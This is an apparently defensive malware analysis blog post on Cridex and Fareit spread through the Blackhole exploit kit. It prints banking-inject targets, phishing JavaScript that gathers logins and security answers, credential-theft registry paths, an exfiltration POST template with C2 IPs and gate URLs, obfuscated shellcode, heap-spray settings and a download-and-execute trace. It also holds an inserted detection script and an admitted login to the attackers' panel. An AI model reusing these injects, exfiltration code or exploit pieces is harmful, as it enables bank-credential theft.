 <url ...">^https://businessaccess\.citibank\.citigroup\.com/</url>
 <url ...">^https://.+/cmserver/</url>
 <url ...">^https://cashmanager\.mizuhoe-treasurer.com/</url>
 <url ...">^https://wellsoffice\.wellsfargo\.com/</url>
 <url ...">^https://.+/onlineserv/CM/</url>
 <url ...">^https://.+/ebc_ebc1961/</url>
 <url ...">^https://(www\.|)sterlingwires\.com/</url>
 <url ...">^https://(www\.|)treasury\.pncbank\.com/</url>
 <url ...">^https://securentrycorp\.</url>
 <url ...">^https://.*ebanking-services\.com/</url>
 <url ...">^https://bnycash\.bankofny\.com/</url>
 <url ...">^https://(.+\.web\-access|webinfocus\.mandtbank)\.com/</url>
 <url ...">^https://.*businessmanager\.com/</url>
 <url ...">^https://businessportal\.mibank\.com</url>
 <url ...">^https://.+/Common/SignOn/</url>
 <url ...">^https://commercial\.wachovia\.com/Online/Financial/Business/</url>
 <url ...">^https://.+\.blilk\.com/</url>
 <url ...">^https://webcmpr\.bancopopular\.com/K1/</url>
 <url ...">^https://trz\.tranzact\.org/</url>
 <url ...">^https://.+\.tdcommercialbanking\.com/</url>
 <url ...">^https://.+\.ffinonline\.com/</url>
 <url ...">^https?://(www\.|)ffbtexas\.com/</url>
 <url ...">^https?://.+\.bancosabadellmiami\.com/</url>
 <url ...">^https://server\d+\.cey-ebanking\.com/CLKCCM/</url>
 <url ...">^https://.+\.ffrontier\.com/</url>
 <url ...">^https://.+\.rbsm\.com/</url>
 <url ...">^https://.+\.firstmerit</url>
 <url ...">^https://.+\.fcsolb\.com</url>
 <url ...">^https://cs\.directnet\.com</url>
 <url ...">^https://.+\.bankofcyprus\.com/</url>
 <url ...">^https://www\.hellenicnetbanking\.com/</url>
 <url ...">^https://www\.e\-moneyger\.com/</url>
 <url ...">^https://.+\.anzdirect\.co\.nz/online/</url>
 <url ...">^https://.+\.anz\.com/inetbank/</url>
 <url ...">^https://.+\.bendigobank\.com\.au/</url>
 <url ...">^https://ib\.nab\.com\.au/nabib/</url>
 <url ...">^https://.+\.nabconnect\.nab\.com\.au/auth/login/</url>
 <url ...">^https://.+\.commbiz\.commbank\.com\.au/</url>
 <url ...">^https://compassconnect\.compassbank\.com/</url>
Below is the method used to redirect into phishing sites: a <replacement> that injects a META refresh into the real login page, sending the victim on to the page the crooks want (URLs defanged as in the original):
<replacement> <url contentType="^text/(html|plain)">^h00ps://direct.53・com/</url>
 META HTTP-EQUIV="Refresh" CONTENT="0; URL=h00ps://express.53.com/express/logon・jsp
It also targets specific URLs being accessed, such as the Amex account summary and the CitiBusiness sign-on:
 <url ...><![CDATA[^h00ps://online\(.)americanexpress\(.)com/myca/.*?request_type=authreg_acctAccountSummary]]>
 <url ...>h00ps://businessaccess\(.)citibank\.citigroup(.)com/cbusol/signon\.do</url>
You can contact me to see the config data extracted.

Phishing

You'll see the phishing code: it collects the login, the password and the three security question/answer pairs from the fake form into one string for upload:
var info = encodeURIComponent('Login='+$('input#EmployerLogin1_cbsys_login_email').
val()+"\n"+'Password='+$('input#EmployerLogin1_cbsys_login_password').
val()+"\n"+$('input[name=q1]').
val()+'='+$('input[name=a1]').
val()+"\n"+$('input[name=q2]').
val()+'='+$('input[name=a2]').
val()+"\n"+$('input[name=q3]').
val()+'='+$('input[name=a3]').
Some more traces of the phishing forms: related to them there is a Luhn (mod 10) checksum routine that validates the credit card number typed into the fake form, presumably so that only well-formed card numbers are collected:
function check_cc(cardnumber) {
     // Luhn (mod 10) check: strip non-digits, accept only 15-16 digit numbers
     var cardNo = cardnumber.replace(/[^0-9]/g, "");
     if (cardNo.length < 15 || cardNo.length > 16) {
       return false;
     }
     var checksum = 0;
     var j = 1;      // weight alternates 1,2,1,2,... starting from the rightmost digit
     var calc;
     var i;          // declared here; the original leaked i as an implicit global
     for (i = cardNo.length - 1; i >= 0; i--) {
       calc = Number(cardNo.charAt(i)) * j;
       if (calc > 9) {   // a doubled digit above 9 contributes its digit sum (calc - 9)
         checksum = checksum + 1;
         calc = calc - 10;
       }
       checksum = checksum + calc;
       if (j == 1) {
         j = 2;
       } else {
         j = 1;
       }
     }
     if (checksum % 10 != 0) {
       return false;
     }
     return true;
}

What Software's Credential is Accessed?

Moreover, in memory the following paths and registry keys were found, showing where credentials are looked for:
 Common AppData
My Pictures
Common Documents
Common Administrative Tools
Administrative Tools
Personal
Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
explorer.exe
Software\Far\Plugins\FTP\Hosts
Software\Far2\Plugins\FTP\Hosts
Software\Far Manager\Plugins\FTP\Hosts
Software\Far\SavedDialogHistory\FTPHost
Software\Far2\SavedDialogHistory\FTPHost
Software\Far Manager\SavedDialogHistory\FTPHost
Password
HostName
User
   :(etc)
The complete list is here -->>[PASTEBIN]. You'll see that most software that uses an Internet username and password is targeted: browsers, intranet tools, FTP clients and plugins, and mailers (POP/SMTP/IMAP).

How Trojan Fareit Sent the Credentials?

How are these credentials sent? In the binary I found the HTTP POST request template below:
POST %s HTTP/1.0
Host: %s
Accept: */*
Accept-Encoding: identity, *;q=0
Content-Length: %lu
Connection: close
Content-Type: application/octet-stream
Content-Encoding: binary
User-Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
Content-Length:
Location:
HWID
{%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X}
The HWID string and the "{%08X-%04X-...}" format string (a GUID-shaped machine identifier) identify the infected host in the upload. The POSTs go to the remote hosts below:
h00p://132.248.49.112:8080/asp/intro.php
h00p://113.130.65.77:8080/asp/intro.php
h00p://203.113.98.131:8080/asp/intro.php
h00p://110.164.58.250:8080/asp/intro.php
h00p://200.108.18.158:8080/asp/intro.php
h00p://207.182.144.115:8080/asp/intro.php
h00p://148.208.216.70:8080/asp/intro.php
h00p://203.172.252.26:8080/asp/intro.php
h00p://202.6.120.103:8080/asp/intro.php
h00p://203.146.208.180:8080/asp/intro.php
h00p://207.126.57.208:8080/asp/intro.php
h00p://203.80.16.81:8080/asp/intro.php
h00p://202.180.221.186:8080/asp/intro.php
The PoC capture I took (screenshot not reproduced here) confirms it. Note the user-agent used:
Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
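The two fake user-agents and the request shapes described in this post are enough for a simple proxy-log check. The Python below is an added example, not part of the post: it scans constructed log lines in a made-up format (timestamp, client, method, URL, status, request Content-Type, quoted user-agent) and flags a Cridex check-in (the fake MSIE 7 user-agent, POST to a bare IP on port 8080) and a Fareit credential upload (the fake MSIE 5 / Windows 98 user-agent, POST to /asp/intro.php with application/octet-stream). The user-agent alone is deliberately not enough to fire, since old but legitimate clients can carry similar strings.

```python
# Added example (not part of the post): flag Cridex check-ins and Fareit
# credential uploads in proxy logs using only the indicators quoted in the post.
# The log format is constructed for this example:
#   <timestamp> <client> <method> <url> <status> <request-content-type> "<user-agent>"
import re
from urllib.parse import urlsplit

CRIDEX_UA = "Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)"
FAREIT_UA = "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)"
FAREIT_GATE_PATH = "/asp/intro.php"

BARE_IPV4 = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}$")
LOG_LINE = re.compile(
    r'^(?P<ts>\S+) (?P<client>\S+) (?P<method>[A-Z]+) (?P<url>\S+) '
    r'(?P<status>\d{3}) (?P<ctype>\S+) "(?P<ua>[^"]*)"$'
)

# Constructed sample lines (the client address is made up). Lines 1 and 4 are benign
# look-alikes: the Cridex user-agent on a GET to a named host, and a Fareit-style
# octet-stream POST to a path other than the gate. Line 5 is malformed on purpose.
SAMPLE_LOG = [
    '2013-01-17T01:28:21Z 192.168.7.84 GET http://www.example.com/index.html 200 - '
    '"Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)"',
    '2013-01-17T01:28:25Z 192.168.7.84 POST http://84.22.100.108:8080/ 200 '
    'application/x-www-form-urlencoded "Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)"',
    '2013-01-17T02:38:40Z 192.168.7.84 POST http://132.248.49.112:8080/asp/intro.php 200 '
    'application/octet-stream "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)"',
    '2013-01-17T02:39:02Z 192.168.7.84 POST https://mail.example.com/owa/ 200 '
    'application/octet-stream "Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)"',
    'this line is not in the expected format',
]


def classify(line):
    """Return a detection name for one log line, or None."""
    m = LOG_LINE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    parts = urlsplit(rec["url"])
    host = parts.hostname or ""
    port = parts.port or (443 if parts.scheme == "https" else 80)

    # Fareit upload: fake MSIE 5 / Win98 agent, binary POST straight to the gate script.
    if (rec["ua"] == FAREIT_UA and rec["method"] == "POST"
            and parts.path.endswith(FAREIT_GATE_PATH)
            and rec["ctype"] == "application/octet-stream"):
        return "fareit-credential-post"

    # Cridex check-in: fake MSIE 7 / Vista agent, POST to a bare IP on port 8080.
    if (rec["ua"] == CRIDEX_UA and rec["method"] == "POST"
            and BARE_IPV4.match(host) and port == 8080):
        return "cridex-checkin"
    return None


def scan(lines):
    """Return [(line_number, detection)] for every line that fires a rule."""
    hits = []
    for number, line in enumerate(lines, start=1):
        tag = classify(line)
        if tag:
            hits.append((number, tag))
    return hits


if __name__ == "__main__":
    for number, tag in scan(SAMPLE_LOG):
        print(f"line {number}: {tag}")
```

Pairing the user-agent with the destination shape is what keeps the check useful after the C2 IP list rotates: the bare-IP-on-8080 and /asp/intro.php patterns survive a change of hosts, while a plain IP blocklist from this post would not.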

The Command and Control Trails

It also carries traces of the admin panel the bad actors access:
var adminPanelLocation = 'h00p://62.76.177.123/if_Career/';
which is used to send the phished information with the URL formulas below (bid is the victim's PC name):
var d = adminPanelLocation + 'gate.php?done=1&bid=%YOUR-PC-NAME%&info='+info+'&rkey=' + Math['random']();
var d = adminPanelLocation + 'gate.php?bid=%YOUR-PC-NAME%&location='+encodeURIComponent(window.location)+'&rkey=' + Math['random']();
In memory I found a large list of passwords for this panel; I posted some of them in the VT comment yesterday:
phpbb      asdf       qazwsx   iloveyou   jordan     pokemon
qwerty     soccer     happy    shadow     faith      iloveyo
jesus      superman   matrix   christ     summer     mustang
abc123     michael    pass     sunshine   ashley     helpme
letmein    cheese     aaaaaa   master     buster     justin
test       internet   amanda   computer   heaven     jasmine
love       joshua     nothing  princess   pepper     orange
password1  fuckyou    ginger   tigger     hunter     testing
hello      blessed    mother   football   lovely     apple
monkey     baseball   snoopy   angel      andrew     michell
dragon     starwars   jessica  jesus1     thomas     peace
trustno1   purple     welcome  whatever   angels     secret
freedom    charlie    grace    killer     daniel     william
jennifer     :    
Frankly, yesterday I happened to test access to the site with some of these passwords and it worked, but today it looks like it is closed..

Research Materials

Here are the samples -->>[MEDIAFIRE]. Please contact me via Twitter by mentioning @MalwareMustDie for the research data.

Additional: New Infector of dfudont.ru:8080

@unixfreaxjp /malware]$ date Fri Jan 18 13:44:56 JST 2013

BHEK Landing page/PluginDetect

Downloads:
--10:58:57--  
h00p://dfudont.ru:8080/forum/links/column.php
           => `column.php'
Resolving dfudont.ru... 89.111.176.125, 91.224.135.20, 212.112.207.15
Connecting to dfudont.ru|89.111.176.125|:8080... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/html]
[      <=>                            ] 117,545       70.64K/s
10:59:01 (70.51 KB/s) - `column.php' saved [117545]
The obfuscated landing page (screenshot not reproduced here); the deobfuscated version is here -->>[HERE]

Some Changes in dfudont.ru:8080 infection

New shellcode in the PluginDetect code. The string is stored reversed (see the .reverse() at the end), and the hex groups contain the letter O where a zero would be, which presumably gets mapped back by a step not shown in this excerpt (snipped as in the original):
function getShellCode(){
  var a = "
8282!%5154!%O415!%94eO!%a451!%eOa4!%9134!%c451!%74eO!%2191!%9124!%9121!%21b1!%9134!%3421!%
2191!%b1b1!%a121!%21b1!%9154!%3421!%2191!%a1e5!%d451!%eOO5!%b1b1!%1421!%2191!%9114!%6421!%
2191!%b181!%e451!%71a4!%O485!%6O85!%5464!%44d5!%b474!%b57O!%6434!%4414!%547O!%a5d5!%e474!%
817O!%81O1!%21O1!%a5d5!%c56O!%7464!%d5c4!%c4e4!%7O7O!%8521!%c5c5!%85O4!%237O!%15e1!%eee6!%
      :
583a!%3cb7!%17be!%3867!%b2de!%c23a!%5f3a!%Ofb2!%423a!%c7cO!%4c7d!%5ae6!%4236!%e43a!%b25f!%
67cO!%673a!%d5ec!%3173!%3c9d!%2f86!%52b2!%9e3e!%c5O2!%O1ad!%6983!%3f72!%deb1!%58b2!%964d!%
1e16!%ddb1!%8Ob2!%3ae5!%dde7!%O5b2!%c5d1!%413a!%3ad5!%97e7!%3c46!%971c!%ccd5!%cOda!%fac1!%
d53d!%11e2!%bee6!%8681!%O93a!%7d7d!%d383!%9a6c!%b14O!%b2c5!%6741!%e43a!%b13f!%e5O2!%e73a!%
8543!%423a!%3a86!%8681!%c43a!%b18e!%1c77!%d5c1!%dacc!%ffff!%beff!%5O8e!%afbe!%O42e!%O382!%
efO8!%9eeO!%6618!%139c!%O185!%cfbe!%4ecf!%6638!%1414!%1414!%".split("").reverse().join(""
Another modification: new heap-spray parameters in the PluginDetect code. They request 300 allocations of 1 MB each, filled with the "%u0c0c%u0c0c" pattern (the classic 0x0c0c0c0c spray address):
function getBlockSize(){
  return 1024}
function getAllocSize(){
  return 1024 * 1024}
function getAllocCount(){
  return 300}
function getFillBytes(){
  var a = '%u' + '0c0c';
  return a + a}
A change was eventually also detected in the JARs only. First and second JAR during download (snipped log):
--11:01:49--  h00p://dfudont.ru:8080/forum/links/column.php
           => `column.php.1'
Resolving dfudont.ru... seconds 0.00, 89.111.176.125, 91.224.135.20, 212.112.207.15
Caching dfudont.ru => 89.111.176.125 91.224.135.20 212.112.207.15
Connecting to dfudont.ru|89.111.176.125|:8080... seconds 0.00, connected.
  :
GET /forum/links/column.php HTTP/1.0 (older java request)
Host: dfudont.ru:8080
  :
HTTP request sent, awaiting response...
  :
HTTP/1.1 200 OK
Server: nginx/1.0.4
Date: Fri, 18 Jan 2013 02:01:44 GMT
Content-Type: application/java-archive
Connection: keep-alive
X-Powered-By: PHP/5.3.18-1~dotdeb.0
Content-Length: 16830
ETag: "571e4f2c6881ced7067423592c3a9958"
Last-Modified: Fri, 18 Jan 2013 02:01:44 GMT
Accept-Ranges: bytes
  :
200 OK
Length: 16,830 (16K) [application/java-archive]
11:01:51 (31.60 KB/s) - `try1.jar' saved [16830/16830]

GET /forum/links/column.php HTTP/1.0 (newer java request)
Host: dfudont.ru:8080
  :
HTTP request sent, awaiting response...
  :
HTTP/1.1 200 OK
Server: nginx/1.0.10
Date: Fri, 18 Jan 2013 02:08:09 GMT
Content-Type: application/java-archive
Connection: keep-alive
X-Powered-By: PHP/5.3.18-1~dotdeb.0
Content-Length: 22824
ETag: "1bfec3a52c1b19ee4aaaba0be551c1f1"
Last-Modified: Fri, 18 Jan 2013 02:02:52 GMT
Accept-Ranges: bytes
  :
200 OK
Registered socket 1896 for persistent reuse.
Length: 22,824 (22K) [application/java-archive]
11:02:59 (35.13 KB/s) - `try2.jar' saved [22824/22824]
Both JARs contain the same exploit code as before; in try1.jar only new obfuscation was detected, while in the (ex-)0day jar, try2.jar, the MD5 changed. Detection ratios of the new samples in VT: [Landing Page] [JAR1] [JAR2]

How about the payload?

It is the same as written in the original post :-) Cridex that drops Fareit. As PoC, the translated API trace of the shellcode shows the URL; the downloaded file is saved as wpbt0.dll and run both directly and via regsvr32 -s:
0x7c801ad9 kernel32.VirtualProtect(lpAddress=0x4020cf, dwSize=255)
0x7c801d7b kernel32.LoadLibraryA(lpFileName=urlmon)
0x7c835dfa kernel32.GetTempPathA(lpBuffer=0x22fc60, nBufferLength=248, [lpBuffer=C:\DOCUME~1\Administrator\LOCALS~1\Temp\])
0x1a494bbe urlmon.URLDownloadToFileA(pCaller=0, szURL=h00p://dfudont.ru:8080/forum/links/column.php?bf=30:1n:1i:1i:33&xe=2v:1k:1m:32:33:1k:1k:31:1j:1o&d=1k&bb=a&hy=m, lpfnCB=0x0, szFileName=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll)
0x7c86250d kernel32.WinExec(lpCmdLine=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll, uCmdShow=0)
0x7c86250d kernel32.WinExec(lpCmdLine=regsvr32 -s C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll, uCmdShow=0)
0x7c81cb3b kernel32.TerminateThread(dwExitCode=0)
Download logs (snipped):
   :
HTTP request sent, awaiting response...
   :
HTTP/1.1 200 OK
Server: nginx/1.0.4
Date: Fri, 18 Jan 2013 04:35:44 GMT
Content-Type: application/x-msdownload
Connection: keep-alive
X-Powered-By: PHP/5.3.18-1~dotdeb.0
Pragma: public
Expires: Fri, 18 Jan 2013 04:35:44 GMT
Cache-Control: must-revalidate, post-check=0, pre-check=0
Cache-Control: private
Content-Disposition: attachment; filename="calc.exe"
Content-Transfer-Encoding: binary
Content-Length: 197632
  :
200 OK
Registered socket 1896 for persistent reuse.
Length: 197,632 (193K) [application/x-msdownload]
100%[====================================>] 197,632       71.52K/s
13:35:53 (71.40 KB/s) - `calc.exe' saved [197632/197632]
The file (same 197,632-byte payload; compared here with the info.exe sample from the first infector):
@unixfreaxjp /malware]$ ls -alF info.exe ; md5 info.exe
-rwxr--r--  1 MMD  toor  197632 Jan 17 01:28 info.exe*
MD5 (info.exe) = f188879d2cc11dae25c6368cd2f4ad96
I guess these moronz didn't have enough time to make a new payload, eh? :-) Tick.. tock.. tick.. tock...

Samples

For the research/education about malware & to increase detection rates - we are sharing the samples here -->>[MEDIAFIRE]
#MalwareMustDie!!

4 comments:

  1. Mediafire blocked the download of the files. Very nice analysis of Fareit btw :)

  2. Horgh. Samples are downloadable now, just checked.

  3. At present I can see a reloaded Dridex targeted at Amazon. I can see that the malware tried to connect to:
      106.216.219.96:http:
      239.255.255:250
      27.5.199.115:http
      46.19.143.151:http
      5-14-181-219.residential.rdsnet.ro:https
      85-143-166-72.clodo.ru:http
      dhcp-92-cast.dipscfm.uninsubria.it:http
      e-u07kicsg661.it.manchester.ac.uk:http
      ip-195-030.africaonline.com.gh:8000
      ipoter.ru:http
      tengo.un.gato.en.mis.pantalones:http-alt